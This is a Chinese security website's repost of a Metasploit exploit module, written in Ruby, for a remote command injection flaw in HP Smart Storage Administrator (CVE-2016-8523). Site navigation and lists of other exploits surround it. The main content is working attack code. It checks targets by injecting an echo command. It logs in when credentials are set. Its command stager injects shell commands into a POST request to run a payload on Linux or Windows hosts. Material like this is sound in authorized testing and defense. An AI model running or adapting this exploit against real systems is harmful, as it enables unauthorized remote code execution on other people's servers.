首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
来源:metasploit.com 作者:MaKyOtOx 发布时间:2017-02-13  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Smart Storage Administrator Remote Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in HP Smart Storage Administrator. By
        supplying a specially crafted HTTP request, it is possible to control the
        'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
        which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Mattiocco (@MaKyOtOx)'  # Discovery & multi-platform Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2016-8523']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => %w{ linux win },
      'Targets'        =>
        [
          ['Linux', {
            'Platform' => 'linux',
            'Arch' => ARCH_X86,
            'CmdStagerFlavor' => 'bourne'
          }],
          ['Linux (x64)', {
            'Platform' => 'linux',
            'Arch' => ARCH_X86_64,
            'CmdStagerFlavor' => 'bourne'
          }],
          ['Windows', {
            'Platform' => 'win',
            'Arch' => ARCH_X86,
            'CmdStagerFlavor' => 'certutil'
          }],
          ['Windows (x64)', {
            'Platform' => 'win',
            'Arch' => ARCH_X86_64,
            'CmdStagerFlavor' => 'certutil'
          }],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 30 2017"
    ))
 
    register_options(
      [
        Opt::RPORT(2381),
        # USERNAME/PASS may not be necessary, because the anonymous access is possible
        OptString.new("USERNAME", [false, 'The username to authenticate as']),
        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
      ], self.class)
  end
 
  def check
 
    @cookie = ''
 
    sig = Rex::Text.rand_text_alpha(8)
    cmd = "&echo%20#{sig}&echo"
    res = send_command(cmd, true)
    if not res
      vprint_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end
 
    if res.code == 200 && res.headers.to_s() =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end
 
    Exploit::CheckCode::Safe
  end
 
 
  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
 
    cookie = ''
 
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => '/proxy/ssllogin',
      'vars_post' => {
        'redirecturl'         => '',
        'redirectquerystring' => '',
        'user'                => username,
        'password'            => password
      }
    })
 
    if not res
      fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
    end
 
    # CpqElm-Login: success
    if res.headers['CpqElm-Login'].to_s =~ /success/
      cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
    end
 
    cookie
  end
 
 
  def setup_stager
    execute_cmdstager(:temp => './', :linemax => 2800)
  end
 
 
  def execute_command(cmd, opts={})
    res = send_command(cmd, false)
    if res && res.code != 200
      vprint_error("Unexpected response:\n#{res}")
      fail_with(Failure::Unknown, "There was an unexpected response")
    end
  end
 
 
  def send_command(cmd, check)
    if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
      @cookie = login
      if @cookie.empty?
        fail_with(Failure::NoAccess, "#{peer} - Login failed")
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end
 
    req_opts = {}
 
    # For the check() function, use GET method
    if check
      req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
      req_opts['method'] = "GET"
    else
      req_opts['uri'] = "/HPSSA/index.htm"
      req_opts['method'] = "POST"
      req_opts['vars_post'] = {'msf'=>'red'}
      case target.opts['Platform']
        when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
        when "win"   then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
      end
    end
 
    unless @cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
    end
 
    send_request_cgi(req_opts)
  end
 
  def exploit
    @cookie = ''
 
    setup_stager
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache OpenOffice Text Documen
·Tor Browser 6.0.5 remote Denia
·Microsoft Office Word Maliciou
·ShadeYouVPN Client 2.0.1.11 -
·GNU / Bash v4.4 autocompletion
·Linux Kernel 3.10.0 (CentOS7)
·Zoom Player 12.7 / 13 Buffer O
·Microsoft Edge - TypedArray.so
·Zookeeper 3.5.2 - Denial of Se
·Piwik 2.14.0 / 2.16.0 / 2.17.1
·OpenBSD HTTPd < 6.0 - Memory E
·RandoriSec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved